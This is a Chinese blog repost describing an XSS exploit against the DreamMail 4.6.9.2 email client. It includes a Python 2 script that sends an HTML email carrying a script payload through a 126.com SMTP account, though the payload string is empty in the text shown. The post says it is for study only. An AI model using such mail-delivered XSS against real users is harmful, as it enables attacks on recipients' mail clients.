博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Dreammail V4.6.9.2 XSS漏洞利用
阅读量:5062 次
发布时间:2019-06-12

本文共 1037 字,大约阅读时间需要 3 分钟。

转载请注明:@小五义

针对版本: DreamMail 4.6.9.2

测试环境:windows xp sp3

python版本:2.6

测试邮箱:126.com

#-*- coding:UTF-8 -*- #@小五义 http://www.cnblogs.com/xiaowuyi import smtplib, urllib2 payload = '''''' def sendMail(toemail, smtpsrv, username, password):        msg  = "From: XXXX@126.com\n"        msg += "To:YYYY@126.com\n"        msg += 'Date: Today\r\n'        msg += "Subject: XSS payload\n"        msg += "Content-type: text/html\n\n"        msg += payload + "\r\n\r\n"        server = smtplib.SMTP()        server.connect(smtpsrv)        server.login(username,password)        try:                server.sendmail(username, toemail, msg)        except Exception, e:                print "[-] Failed to send email:"                print "[*] " + str(e)        server.quit() username = "XXXX@126.com" #也可使用其它邮件服务器password = "XXXXX"  #密码toemail = "YYYY@126.com"smtpsrv  = "smtp.126.com" print "[*] Sending Email"sendMail(toemail, smtpsrv, username, password)

发送成功后,当用dreammail浏览该邮件时,会弹窗提示,如下:

该博文仅供学习交流。

转载于:https://www.cnblogs.com/xiaowuyi/p/3281259.html

你可能感兴趣的文章
windows下编译FreeSwitch
查看>>
git .gitignore 文件不起作用
查看>>
Alan Turing的纪录片观后感
查看>>
c#自定义控件中的事件处理
查看>>
App.config自定义节点读取
查看>>
unity3d根据手机串号和二维码做正版验证
查看>>
二十六、Android WebView缓存
查看>>
django Models 常用的字段和参数
查看>>
linux -- 嵌入式linux下wifi无线网卡驱动
查看>>
SVN使用教程总结
查看>>
SQL中varchar和nvarchar有什么区别?
查看>>
OpenCV矩阵运算总结
查看>>
Java Build Practice 4:Extend and Invoke Ant API
查看>>
[转] Transformer图解
查看>>
FreeBSD方式安装 MAC OSX
查看>>
Linux 根文件系统制作
查看>>
IOS--沙盒机制
查看>>
使用 JointCode.Shuttle 访问任意 AppDomain 的服务
查看>>
sqlite的坑
查看>>
digitalocean --- How To Install Apache Tomcat 8 on Ubuntu 16.04
查看>>